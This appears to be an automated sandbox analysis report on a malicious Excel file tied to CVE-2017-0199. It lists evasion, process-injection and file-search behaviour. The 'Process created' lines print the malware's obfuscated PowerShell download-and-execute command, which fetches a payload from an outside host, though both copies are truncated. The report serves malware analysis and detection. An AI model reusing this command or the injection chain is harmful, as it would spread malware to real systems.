                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxStream path 'Workbook' entropy: 7.99920334828 (max. 8.0)
                  Source: F9430000.0.drStream path 'Workbook' entropy: 7.99939390641 (max. 8.0)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040F7E2 Sleep,ExitProcess,14_2_0040F7E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,14_2_0041A7D9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599922Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2258Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1107Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1562Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3905Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1660Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 8316Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_14-53648
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3128Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2772Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2672Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2948Thread sleep count: 1562 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2948Thread sleep count: 3905 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1484Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980Thread sleep time: -599922s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2908Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2760Thread sleep count: 1660 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2760Thread sleep time: -4980000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3064Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2760Thread sleep count: 8316 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2760Thread sleep time: -24948000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3020Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407877 FindFirstFileW,FindNextFileW,14_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044E8F9 FindFirstFileExA,14_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10006580 FindFirstFileExA,14_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00418981 memset,GetSystemInfo,15_2_00418981
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599922Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CBE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00443355 mov eax, dword ptr fs:[00000030h]14_2_00443355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10004AB4 mov eax, dword ptr fs:[00000030h]14_2_10004AB4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,14_2_00411D39
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434BD8 SetUnhandledExceptionFilter,14_2_00434BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0043503C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0043BB71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_100060E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_10002639
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_10002B1C

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3308, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Contains functionality to inject code into remote processes
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,14_2_0041812A
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe14_2_00412132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00419662 mouse_event,14_2_00419662
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? 